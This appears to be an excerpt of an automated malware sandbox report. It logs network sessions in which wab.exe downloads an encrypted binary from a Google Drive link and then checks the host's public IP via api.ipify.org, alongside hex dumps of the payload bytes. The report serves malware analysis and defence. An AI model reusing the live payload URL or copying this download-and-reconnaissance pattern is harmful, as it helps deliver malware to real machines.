                                                        2024-04-18 09:07:11 UTC1255INData Raw: 56 35 64 68 6f 61 67 36 6b 63 52 31 7a 63 34 47 4f 49 2b 42 4c 79 50 61 47 72 59 48 45 55 73 6e 44 7a 70 54 35 6d 67 6b 59 32 46 2f 66 31 61 30 45 6a 70 6a 63 48 54 70 51 62 49 6c 4d 6b 66 68 69 79 59 67 45 73 79 2b 30 55 74 4c 61 76 63 49 77 6f 61 52 74 4d 68 4e 2f 63 53 71 31 4a 34 75 4f 48 6f 33 6a 75 45 4a 72 42 72 45 54 47 53 4d 66 4a 37 71 75 6a 6a 47 31 58 4a 64 75 36 58 76 4e 72 58 55 35 4c 6e 6c 54 55 50 78 76 36 58 76 66 6f 57 7a 34 4c 6d 37 70 65 43 35 75 36 58 67 75 62 75 6c 34 4c 6d 37 70 65 42 45 4a 4e 68 32 6f 72 4f 70 43 6d 73 71 51 52 2f 71 41 4c 69 30 45 39 30 6b 45 39 2b 4a 63 4a 41 34 55 4a 4b 68 78 71 30 73 34 7a 57 5a 52 4c 33 6a 2f 75 2b 4b 64 4c 63 43 6a 4e 79 68 6f 39 69 58 4f 74 45 6d 72 7a 4f 4b 37 65 49 77 4b 47 53 35 75 36 56
                                                        Data Ascii: V5dhoag6kcR1zc4GOI+BLyPaGrYHEUsnDzpT5mgkY2F/f1a0EjpjcHTpQbIlMkfhiyYgEsy+0UtLavcIwoaRtMhN/cSq1J4uOHo3juEJrBrETGSMfJ7qujjG1XJdu6XvNrXU5LnlTUPxv6XvfoWz4Lm7peC5u6Xgubul4Lm7peBEJNh2orOpCmsqQR/qALi0E90kE9+JcJA4UJKhxq0s4zWZRL3j/u+KdLcCjNyho9iXOtEmrzOK7eIwKGS5u6V
                                                        2024-04-18 09:07:11 UTC1255INData Raw: 63 68 41 52 64 53 51 53 6b 42 64 73 51 6b 47 2f 70 58 76 6d 65 2f 54 2f 73 79 75 33 6d 6d 45 48 54 59 47 67 55 36 65 70 6d 33 7a 35 6e 75 4e 2b 47 6b 63 33 6d 4d 6a 43 65 75 37 75 6c 4c 41 32 77 56 62 4c 55 56 4d 7a 41 4c 30 30 58 38 33 5a 58 76 73 49 30 6d 53 7a 30 66 6d 32 77 59 71 4e 2f 4c 44 72 76 42 58 47 2b 52 62 63 6b 46 69 77 59 6b 35 63 34 54 61 2b 41 2f 47 59 6b 46 67 6a 6f 67 71 77 34 66 53 78 37 37 71 34 73 37 6a 69 55 77 6f 6c 73 54 6d 2f 52 2f 39 7a 4e 34 30 59 49 61 4e 4e 42 4a 7a 4d 4e 6b 4d 4d 2b 6e 65 44 73 71 4c 4b 36 56 69 67 4c 63 2b 34 77 56 58 45 42 53 4d 52 39 73 65 39 79 76 4a 70 68 76 75 73 77 4d 4a 36 37 75 36 55 66 61 65 4e 69 5a 62 53 35 70 65 42 6d 6e 31 67 75 4f 41 36 6f 34 72 6d 37 56 51 41 37 6f 79 52 56 74 4c 6d 6c 34 43
                                                        Data Ascii: chARdSQSkBdsQkG/pXvme/T/syu3mmEHTYGgU6epm3z5nuN+Gkc3mMjCeu7ulLA2wVbLUVMzAL00X83ZXvsI0mSz0fm2wYqN/LDrvBXG+RbckFiwYk5c4Ta+A/GYkFgjogqw4fSx77q4s7jiUwolsTm/R/9zN40YIaNNBJzMNkMM+neDsqLK6VigLc+4wVXEBSMR9se9yvJphvuswMJ67u6UfaeNiZbS5peBmn1guOA6o4rm7VQA7oyRVtLml4C
                                                        2024-04-18 09:07:11 UTC1255INData Raw: 59 38 43 4a 66 61 35 65 61 6c 45 54 4c 6e 44 66 52 48 34 44 34 75 57 43 4e 65 67 68 46 30 6b 38 49 4c 4f 49 2b 42 63 44 6b 46 4c 47 47 56 6e 35 33 34 42 4c 4a 70 51 4a 71 41 51 43 2f 7a 45 39 78 6e 4c 39 4a 4b 4d 44 6a 2f 65 41 2f 74 72 78 38 72 2f 45 51 77 65 4c 6d 37 70 52 4f 32 66 4a 50 67 75 62 75 6c 34 4c 6d 37 70 65 43 35 75 36 58 67 75 62 75 6c 34 46 4c 55 67 79 42 6b 41 6e 59 2f 58 71 6e 68 37 4e 6e 6f 72 72 51 61 4c 59 6c 6a 38 56 49 6b 55 36 31 50 4d 71 58 59 69 4f 46 44 42 30 44 30 57 59 5a 65 4b 79 77 34 53 6c 76 79 48 51 30 6b 43 58 68 4e 6a 35 72 70 4a 79 77 41 75 4c 4d 34 5a 58 37 49 73 36 42 70 68 31 56 51 78 4e 51 57 4d 61 70 6c 6a 49 4c 62 36 68 33 52 34 44 70 54 38 6d 76 42 39 48 43 77 72 4d 54 62 75 45 52 6c 35 51 4e 4d 39 53 62 30 59
                                                        Data Ascii: Y8CJfa5ealETLnDfRH4D4uWCNeghF0k8ILOI+BcDkFLGGVn534BLJpQJqAQC/zE9xnL9JKMDj/eA/trx8r/EQweLm7pRO2fJPgubul4Lm7peC5u6Xgubul4FLUgyBkAnY/Xqnh7NnorrQaLYlj8VIkU61PMqXYiOFDB0D0WYZeKyw4SlvyHQ0kCXhNj5rpJywAuLM4ZX7Is6Bph1VQxNQWMapljILb6h3R4DpT8mvB9HCwrMTbuERl5QNM9Sb0Y


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.949713142.251.15.1394437228C:\Program Files (x86)\Windows Mail\wab.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-04-18 09:07:57 UTC216OUTGET /uc?export=download&id=1nQic9drH1PbiJHqocgcGVmSGhgio27Iy HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        2024-04-18 09:07:57 UTC1582INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 18 Apr 2024 09:07:57 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1nQic9drH1PbiJHqocgcGVmSGhgio27Iy&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: script-src 'nonce-dFBStIAnVnQwSqLd3y-8_g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        3192.168.2.949714142.250.105.1324437228C:\Program Files (x86)\Windows Mail\wab.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-04-18 09:07:57 UTC258OUTGET /download?id=1nQic9drH1PbiJHqocgcGVmSGhgio27Iy&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        2024-04-18 09:07:58 UTC4752INHTTP/1.1 200 OK
                                                        Content-Type: application/octet-stream
                                                        Content-Security-Policy: sandbox
                                                        Content-Security-Policy: default-src 'none'
                                                        Content-Security-Policy: frame-ancestors 'none'
                                                        X-Content-Security-Policy: sandbox
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Cross-Origin-Embedder-Policy: require-corp
                                                        Cross-Origin-Resource-Policy: same-site
                                                        X-Content-Type-Options: nosniff
                                                        Content-Disposition: attachment; filename="cpKIhQ152.bin"
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Credentials: false
                                                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Goog-Maps-Ios-Uuid, X-Goog-Maps-Android-Uuid, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Desusertion, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context, x-goog-nest-jwt
                                                        Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                        Accept-Ranges: bytes
                                                        Content-Length: 243776
                                                        Last-Modified: Tue, 16 Apr 2024 19:09:19 GMT
                                                        X-GUploader-UploadID: ABPtcPo_DL-tHyYydKc7EJh91HXwm3cIJErF3obwfUCX9E0PXyA98G35GRbGqpeE1COapDLrEbYUzo1iBg
                                                        Date: Thu, 18 Apr 2024 09:07:58 GMT
                                                        Expires: Thu, 18 Apr 2024 09:07:58 GMT
                                                        Cache-Control: private, max-age=0
                                                        X-Goog-Hash: crc32c=I6FX/g==
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close
                                                        2024-04-18 09:07:58 UTC4752INData Raw: 92 9a e2 b4 a4 53 2e ce ef ff 67 74 14 5a 87 75 48 74 6f cb 9f 9f ee cf 28 c3 8a 6b e8 5d 5f 14 9a 49 c4 7e d3 d1 7f 50 be 47 55 c7 ca 1f eb 18 ca a9 07 2f 8b 9d 4d 64 a1 5a 9c f9 12 5f c8 34 be 3c ef 14 d4 da 3f db 19 29 a2 4b 73 dc 53 63 1f 09 68 45 bd 17 70 b5 30 37 1a c1 40 0f 07 a8 b6 07 81 b2 bb 71 c8 3d 06 27 a7 f3 6c a6 8f 1c a5 8e b7 29 ae d1 aa af 05 94 85 6c 9e 8f 1e 73 e9 9e a0 0d 28 e6 72 66 00 b5 15 83 9c 4a 8b 22 b1 6c 44 04 66 25 fe 02 3d a8 96 c7 87 5c cb bd b9 3d 5e 78 da 2e 6d b6 5b f9 63 5b 81 65 4e 94 39 87 15 1d 6f a8 05 9e 3a 33 2a 57 52 6b c4 fa 69 a9 29 4d f1 76 d3 51 d3 ca 3f 23 37 07 07 74 b5 ba ab 36 18 8b 2b fb f8 85 2c f3 c9 dc 3e c9 7d 82 38 06 39 e0 c2 23 02 d2 35 9c d3 7f bf e6 e3 4a d6 e0 c1 3b 18 05 62 d4 74 28 d6 c1 2f
                                                        Data Ascii: S.gtZuHto(k]_I~PGU/MdZ_4<?)KsSchEp07@q='l)ls(rfJ"lDf%=\=^x.m[c[eN9o:3*WRki)MvQ?#7t6+,>}89#5J;bt(/
                                                        2024-04-18 09:07:58 UTC4752INData Raw: d6 88 c2 a2 a7 3b 6c e9 02 ed a3 4c 80 15 a0 3b 74 20 1e 73 48 fd 6a 38 9e 1c a8 f2 cb 7a 88 aa d2 b7 24 8c 43 e4 d1 46 0d 74 cd 32 09 74 80 6c dd 0e fe d3 55 34 9f 77 90 a9 6a 34 2b b6 4b d1 bf 6c 3e 33 fb 41 ba ba 8c 5e e6 1d 45 15 a6 e3 26 13 9d 14 70 4e 2f 0f ff e9 bc 72 63 f2 11 66 6b f7 3b 52 86 38 67 ed 86 8d 96 39 b2 88 70 68 0a 8c 52 89 68 0c 5e 22 50 59 65 79 86 96 c9 ec 58 2d c8 4b 29 ac 9e 44 f6 eb 21 9d 7d 64 8c 91 3c f9 eb 1d 20 67 63 39 a3 8a 7b 30 41 f6 33 aa cc 25 a4 4a 32 a9 b2 93 5a c5 65 9d 0b 4c c1 8a 73 3a 0f f2 c8 f9 2c d0 72 ee 2a db 03 2b 60 34 91 41 5e 4a a3 cb 14 bc d9 99 c7 65 aa 55 37 9b 4c 30 7e 62 88 7e e9 b9 b2 10 64 ef ca a3 bb 8e 6d 44 32 73 ae a0 79 c0 df 21 1f 58 1d 33 bb e6 0b 34 2d 17 ff 62 7f 34 d5 da 3f db e3 28 9b
                                                        Data Ascii: ;lL;t sHj8z$CFt2tlU4wj4+Kl>3A^E&pN/rcfk;R8g9phRh^"PYeyX-K)D!}d< gc9{0A3%J2ZeLs:,r*+`4A^JeU7L0~b~dmD2sy!X34-b4?(
                                                        2024-04-18 09:07:58 UTC447INData Raw: 19 00 4f c3 9d 67 b7 cd 29 70 b1 9b 0c fb 99 8e df 06 9d 78 f1 b3 b9 3d d3 64 a6 fa 9b 67 7b 3f b6 2e 00 c5 03 a5 70 1e 60 e1 2c 98 95 0a 50 9d 19 a7 02 08 9c 25 41 77 83 ca 72 71 78 21 37 5d 3c 1e 28 1f 25 95 1a 63 c0 0f 9a fd a3 1d 46 e9 31 d6 7a c5 b2 17 24 96 c0 71 86 1f 7c f0 8c bc 59 08 fd c6 0f 22 09 be 39 0b 20 79 11 90 18 44 7a 99 1b e2 1b a5 99 17 1f 53 ba c9 d5 51 29 b3 60 93 f6 2c 08 48 3d 64 06 94 d0 30 7d 66 ec 6b 54 77 e1 60 b4 0c 95 c6 78 1f 34 2b c6 17 37 00 8e 5f 6b da 80 1e d0 7a 37 78 53 28 99 18 97 23 30 c0 f9 28 a4 82 c2 72 eb 02 19 17 d5 29 83 4b 8a 3d 9c c5 7a 2a e0 7d b6 f1 4a 2f be 16 a8 0c c5 88 89 93 3f bb 28 8c 10 a1 d1 46 0b 0a cf 0b 07 70 a0 67 e5 33 fd 2d 5b 14 85 77 6e a5 94 3a 07 b1 4b 2f b3 9e 3f 2a ff 41 ba ba 01 0e df
                                                        Data Ascii: Og)px=dg{?.p`,P%Awrqx!7]<(%cF1z$q|Y"9 yDzSQ)`,H=d0}fkTw`x4+7_kz7xS(#0(r)K=z*}J/?(Fpg3-[wn:K/?*A
                                                        2024-04-18 09:07:58 UTC1255INData Raw: b9 70 37 e4 cd 4c 0f 27 bd b6 07 81 4c ba 48 c6 3d 06 27 9f bc 6e a6 8f 3c b3 8e b7 29 50 df a6 af 05 6a 89 60 1e af 0c 73 e7 81 e4 02 11 49 7b ab 21 f3 18 cb 51 43 e0 4a d8 15 e8 30 14 4a 98 8e 52 c5 b6 84 f5 32 a5 d2 33 13 30 1d fa a2 14 d4 7b b0 04 7b c5 2a e3 b5 6d fe 71 78 41 5b 04 91 1e 1b 69 57 52 61 3a f4 39 ec 09 47 bd 77 d0 af 96 b7 3e 45 c9 0b 0b 74 95 b0 ab 36 f8 75 28 c3 fd 84 27 f3 f1 af 3c c9 7d aa 33 06 39 e0 3c 2d 40 1e 36 62 df 53 bf c6 fb aa d5 e0 3f 3a 61 25 62 f4 74 d6 da c7 2f 0f 5a ad 74 b3 29 20 25 e3 bd 4d df 52 7f 3b ce 9a 2c 6e 83 1b 27 d5 4b 70 ca 87 ba 93 e9 02 89 52 48 8c da e1 80 78 cb ea a8 0f 52 02 81 ac 92 12 06 b7 66 a5 67 58 4b fc 38 5c e8 a0 28 0a 24 18 e0 6d a7 9e f9 33 16 33 7a 7c 2c 1d c1 74 ab c9 2b c9 6e 8e b5 2b
                                                        Data Ascii: p7L'LH='n<)Pj`sI{!QCJ0JR230{{*mqxA[iWRa:9Gw>Et6u('<}39<-@6bS?:a%bt/Zt) %MR;,n'KpRHxRfgXK8\($m33z|,t+n+
                                                        2024-04-18 09:07:58 UTC1255INData Raw: a6 71 10 a5 8e 97 2b ae d1 aa 51 04 ad 8a 6c 1e 8f 3e 72 e7 81 1a 29 08 51 7b ab 21 f3 1a cf 51 6b 21 46 d8 1f 44 74 14 4a 99 8e 5d fc bc a4 e6 32 a5 f2 cc 1d 3c 1d 04 52 18 d8 7b 6e 01 7b c5 0a 1a b4 54 e8 8f 79 78 a0 08 94 1e 0b 2f 57 52 6b fc 24 c7 13 d6 6d bd 77 d0 51 b2 bb 3e 5e 07 05 07 ef b5 ba ab 3e f8 8b 38 da f3 84 27 f3 37 7c 3f c9 45 de 38 06 39 e0 3c 2f 4e 1e 16 9d d3 5f bf 18 e2 93 c7 e0 c1 3b 78 05 62 f4 74 d6 d8 c3 2f ff 50 ad 74 b2 ff 15 27 e3 b7 9b ef 50 7f 11 30 94 2c 6e 5d 03 1e df 4b 8e c4 8b 9a 92 17 0e 85 ac 66 86 da e1 7e 8a c8 d3 9e 0d 52 02 7f 5e 97 2b 2b f3 66 a5 55 a3 45 f9 38 44 46 5f d7 f5 f2 5b ec 6d ad 0f bb 3f 16 19 a7 71 2c 1d 17 45 92 c7 2d ef 90 96 4b 25 dc 30 09 3a 09 fb 2b a4 e6 20 1b e5 a7 27 0b 12 a2 cf 43 c0 30 cf
                                                        Data Ascii: q+Ql>r)Q{!Qk!FDtJ]2<R{n{Tyx/WRk$mwQ>^>8'7|?E89</N_;xbt/Pt'P0,n]Kf~R^++fUE8DF_[m?q,E-K%0:+ 'C0
                                                        2024-04-18 09:07:58 UTC1255INData Raw: fc 08 52 7b ab 21 27 0f ff 53 6b ac 48 d8 1f 68 74 14 5b b9 70 5c c5 b6 5a e8 35 a5 ea 96 1f 3c 1d fa a2 14 df 7b b0 0c 7b c5 2a e3 b5 6d ff 71 78 41 d7 e4 90 1e 43 59 02 52 6b ce 04 37 ec 29 6d bf 77 d0 51 66 b5 39 45 37 f9 0b 73 b5 9a a9 36 f8 8b d7 fb ca 75 26 f3 c9 8c 31 c9 7d e5 6e 06 39 ea 3c 2d 4d 1e c8 90 d2 5f d0 b1 e3 aa df 1e cf 3e 58 3d d0 f4 74 28 28 cf 2a df 3d f5 74 b2 0b e5 2b e1 b7 9b ef 50 7f 43 02 91 2c 1e cc 5b 27 d5 41 e1 ed 8b ba 99 78 54 85 52 62 f6 96 e4 80 f6 e2 88 be 0f 58 3b 58 a0 96 12 d0 ff 64 a5 1f de 40 f9 48 13 b8 a0 28 00 b5 3f ec 6d ad 0f a9 3f 16 19 2b f8 29 1d 4f 1a c3 c7 2b c3 54 d3 4b 25 22 c0 04 38 d4 87 19 a1 e6 76 8a b0 a7 27 ff 73 8a cf 9e ca 5f 95 f6 68 8f 64 06 10 8d 45 c1 b0 ab 46 94 be d5 b3 f5 c8 53 20 48 46
                                                        Data Ascii: R{!'SkHht[p\Z5<{{*mqxACYRk7)mwQf9E7s6u&1}n9<-M_>X=t((*=t+PC,['AxTRbX;Xd@H(?m?+)O+TK%"8v's_hdEFS HF
                                                        2024-04-18 09:07:58 UTC1255INData Raw: c6 b6 a4 18 3e a6 d2 ed 1e 3c 1d fa a2 19 e1 64 90 0d 7b 3b 26 1c b4 aa e1 70 78 69 c7 08 94 14 47 39 57 52 69 3a f4 3b ec 09 49 bd 77 d0 af 96 b8 3e 45 c9 0b 04 74 95 ba ab 36 f8 75 28 c3 f9 84 27 f3 c9 52 3c c9 7d 8a c6 08 3a e0 c2 dd 40 1d 36 bc d5 5f bf e6 1d ab ec e5 c1 3b 58 3d 67 f4 74 28 ee 35 d1 20 ad 87 74 b2 01 08 15 e0 b7 7c e2 52 7f 3f 30 94 3d 4e a3 02 27 d5 b5 80 c7 8b 82 96 16 0e 85 52 96 88 d9 e1 a0 83 ca d3 be f1 53 3b 69 a0 96 12 d0 ff 66 a5 93 aa 44 f9 78 36 e1 a0 28 2a dc 16 ec 6d 59 6e f6 3f 16 ed 55 7f 2c 3d 3c 75 92 c7 d5 c8 57 85 4b 25 22 c0 04 3b d4 0b 22 a5 e6 2e f4 e9 a7 2d 81 08 a3 cf 9c 3e 3e cd f6 48 81 16 92 15 73 3b ad e1 ab b8 92 87 f7 93 f7 c8 ad 2c b4 47 45 82 ee 41 55 b1 0c 0c 54 e0 ca c6 84 fe b1 7f 5d 28 e3 ac 1e c5
                                                        Data Ascii: ><d{;&pxiG9WRi:;Iw>Et6u('R<}:@6_;X=gt(5 t|R?0=N'RS;ifDx6(*mYn?U,=<uWK%";".->>Hs;,GEAUT](
                                                        2024-04-18 09:07:58 UTC1255INData Raw: 4a 55 d1 74 78 41 a5 30 91 1e 33 2a 6f 8c 96 3b 05 47 8c 29 4d b7 89 d9 50 98 45 37 47 37 f9 0e 77 b5 92 97 36 f8 8d 03 fa e8 b4 22 f3 d9 73 3d c9 6d 8a 38 17 19 e0 c2 23 4c e0 38 9f d3 67 cc e6 e3 aa d5 1e cd 38 58 25 63 f4 74 28 28 c2 16 cd 52 ad 74 92 01 1b 25 e3 49 6b e3 52 5f 33 30 94 2c 90 ad 01 27 d5 b5 82 c7 8b 9a 91 17 0e 85 ac 69 bd d4 e1 80 86 f2 69 be 0f 52 22 7c a0 96 12 d0 fd 65 a5 6d 58 49 fa 38 5c e1 a0 28 0a 24 17 d5 67 a7 60 f5 3f 36 12 59 7c 2c e3 31 76 92 c7 d5 c5 6d 9a 6b 26 22 3e 08 c4 d5 cc 2e a4 e6 06 dd ec a7 27 f5 24 2b 30 61 3f 18 82 f6 68 8f 79 f1 15 8d 3f c1 85 ab 46 94 7a f9 b2 f5 36 a1 2d 4a 6e 42 93 ee 47 ab 41 02 0c aa 17 c4 c7 a4 d3 b2 7f 5d d6 14 a2 1d be b6 db e0 41 ec 1e 1e 3d c9 61 29 58 12 7c 8a f5 56 35 dc b8 57 4c
                                                        Data Ascii: JUtxA03*o;G)MPE7G7w6"s=m8#L8g8X%ct((Rt%IkR_30,'iiR"|emXI8\($g`?6Y|,1vmk&">.'$+0a?hy?Fz6-JnBGA]A=a)X|V5WL
                                                        2024-04-18 09:07:58 UTC1255INData Raw: 77 d0 4a a8 b9 3e a5 37 07 07 65 b5 ba ba 16 f8 8b 29 fa 0d 8a 25 f3 f1 f3 3d c9 7d 8a c6 0a 3b e0 e2 22 4c 1e 36 62 d2 66 a3 e6 e3 aa 2b e9 c1 3b 23 71 62 f4 70 00 b8 c3 2f d5 68 00 74 b2 01 3b 27 e3 b7 65 1d 5c 7d 31 30 6a 20 6c a3 22 25 d5 4b 8e 3a 8a 83 81 17 0e 85 72 68 84 da e1 7e 88 ca d3 9e 0c 52 02 7f 5e 98 10 2e f3 98 a9 6f a6 65 f9 38 7c e1 5e 29 33 d0 16 ec 6d a7 40 f4 3f 16 13 a7 72 2e 1d 3f 8b 9e c5 2b e9 6d 9a 4b 25 dc 3f 31 3f d4 f5 2b 9c e3 06 e5 e9 9f 5d 0a e3 5c 31 97 c0 30 b4 83 68 85 12 b7 eb 83 34 ae 1f a6 46 9e ac 98 b3 f5 c2 53 25 4a 46 07 e7 ee 41 51 67 06 0c 54 18 3a ce 84 de c0 44 5f 28 6d df 69 c5 d3 df 3d 56 12 12 1c c3 e5 61 29 61 1b 54 b1 f5 a8 3f a0 de 7f 3c c1 d9 93 fe 5a d4 16 6d db 2c de 62 f3 5a b3 c6 42 1a 84 12 7b 9c
                                                        Data Ascii: wJ>7e)%=};"L6bf+;#qbp/ht;'e\}10j l"%K:rh~R^.oe8|^)3m@?r.?+mK%?1?+]\10h4FS%JFAQgT:D_(mi=Va)aT?<Zm,bZB{
                                                        2024-04-18 09:07:58 UTC1255INData Raw: f3 c9 78 40 bd 7d 8a 3c 26 53 e0 c2 23 b2 10 36 9c d3 a1 b3 e6 e3 8a 8d e0 c1 3b a6 04 5b d6 74 28 d6 3d 26 df 52 88 0f c6 01 1b 21 91 d7 63 e3 22 57 2d 30 94 26 13 d7 02 27 d1 6b d7 c4 8b ba 6d 19 0e 85 52 96 88 da e1 a0 8f ca d3 be f1 53 3b 5c a0 96 12 d0 fa 66 a5 45 e8 45 f9 3e 82 e8 a1 28 2a a9 16 ec 6d 59 61 aa 06 86 13 59 7c 0c 17 3f 75 92 39 25 c9 6e 9a b5 29 22 3e 28 73 d4 f5 2b 5a e7 3f c7 e9 a7 27 0b 15 a3 cf bb bb 44 cf f6 6c f7 7a 94 15 fd 1d b2 e1 ab 4c e3 f0 f7 b3 f1 e8 e7 2c 4a 46 82 9d ee 41 55 b1 0c 0c 54 3e 8a c7 84 de 4c 7e 64 3f 1d a2 1d 3b da da e0 65 64 12 1c 3d a9 fc 20 58 12 74 fe f5 56 33 5f d0 57 4c c1 27 95 22 70 f5 03 6d db 2e 20 f7 ca 68 7f c6 51 30 a4 14 7b 8f 24 02 f9 76 57 14 7b 54 40 f1 3f 60 b5 01 cd d9 33 60 cb 88 ef e7
                                                        Data Ascii: x@}<&S#6;[t(=&R!c"W-0&'kmRS;\fEE>(*mYaY|?u9%n)">(s+Z?'DlzL,JFAUT>L~d?;ed= XtV3_WL'"pm. hQ0{$vW{T@?`3`


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        4192.168.2.949715104.26.13.2054437228C:\Program Files (x86)\Windows Mail\wab.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-04-18 09:07:59 UTC155OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                        Host: api.ipify.org
                                                        Connection: Keep-Alive
                                                        2024-04-18 09:07:59 UTC211INHTTP/1.1 200 OK
                                                        Date: Thu, 18 Apr 2024 09:07:59 GMT
                                                        Content-Type: text/plain
                                                        Content-Length: 12
                                                        Connection: close
                                                        Vary: Origin
                                                        CF-Cache-Status: DYNAMIC
                                                        Server: cloudflare
                                                        CF-RAY: 876381fb59271d6a-ATL
                                                        2024-04-18 09:07:59 UTC12INData Raw: 38 31 2e 31 38 31 2e 35 37 2e 35 32
                                                        Data Ascii: 81.181.57.52


                                                        Statistics

